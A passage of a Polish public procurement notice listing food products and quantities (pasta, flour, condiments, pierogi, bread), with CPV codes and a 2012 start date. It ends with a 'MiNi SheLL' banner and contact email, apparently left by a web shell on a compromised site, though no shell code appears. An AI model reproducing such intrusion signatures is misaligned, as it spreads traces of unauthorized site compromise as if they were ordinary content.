9	Koncentrat pomidorowy  (Łowicz) 19 g - 300 szt.
10	Ketchup op. 1 kg - 10 szt.                      
11	Ketchup op. 0.25 g - łagodny - 150 szt.
12	Kasza jęczmienna 1 kg - 55 kg
13	Kostka drobiowa (12 kostek) - 60szt.
14	Liść laurowy 6 g - 75 szt
15	Makaron  lubelski 500 g świderki - 400szt.
16	Makaron  lubelski 500 g wstążka - 130 szt.
17	Makaron lubelski 500 g spaghetti - 240 szt.
18	Makaron lubelski 400 g kokarda - 90 szt.
19	Makaron łazanki 500 g - 50 szt.
20	Makaron  Skalbmierz 250 g nitki - 80 szt.
21	Makaron Czarniecki 250 g nitki - 80 szt.
22	Makaron Czarniecki 500 g wstążka - 30 szt.
23	Majonez  Winiary 0,7 g - 30 szt.
24	Mąka Szadkowska 1 kg - 420 kg
25	Majeranek 8 g - 70 szt.
26	Nać pietruszki 10 g - 100 szt.
27	Olej rzepakowy do smażenia 1 l - 200 szt.
28	Ogórek Konserwowy 2,65 l - 36 szt.
29	Pieprz mielony 20 g - 230 szt.
30	Pierogi z farszem (owoc, ser, mięso) 1 kg  gotowane nie mrożone - 176 kg
31	Przecier ogórkowy 280 g - 100 szt.
32	Pomysł na (Chłopski garnek) - 50 szt.
33	Kluski parowe (Pampuchy) op (8szt.) - 180 op.
34	Przyprawa do kurczaka 20 g - 30 szt.
35	Ryż w saszetkach 400 g - 250 szt.
36	Ryż 1 kg - 110 kg
37	Sól 1 kg - 140 kg
38	Sos do spaghetti 450 g - 100 szt.
39	Szczaw konserwowy 280 g - 60 szt.
40	Sok Paola 0,5 l - 120 szt.
41	Sos słodko-kwaśny 450 g - 90 szt.
42	Bułka tarta - 8 kg
43	Dżem truskawkowy wysokosłodzony słoik 0,27 g - 110 szt.
44	Groch łuskany op. 0,5 kg - 10 kg
45	Makaron nitki  Lubella op. 0,5 kg - 140 szt.
46	Drożdże 0,10 dkg - 40 szt.
47	Syrop Herbapol 420 ml - 400 szt.
48	Czekolada różne smaki 100 g - Goplana - 100 szt.
49	Kw. Cytrynowy 50 g. - 15 szt.
50	Budyń (Delecta) śmietankowy - 60 szt.
51	Kisiel (Delecta) wiśniowy - 100 szt.
52	Herbata ekspresowa op. 100 szt. (Saga) - 60 op.
53	Krem czekoladowy op. 180 g - 70 szt.
54	Mąka ziemniaczana op. 1 kg - 10 kg
55	Płatki kukurydziane (Corn flakes) - op. 0,5 kg - 15 szt.
56	Wafel (Grześ) w czekoladzie - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb zwykły krojony 600 g - 1930 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com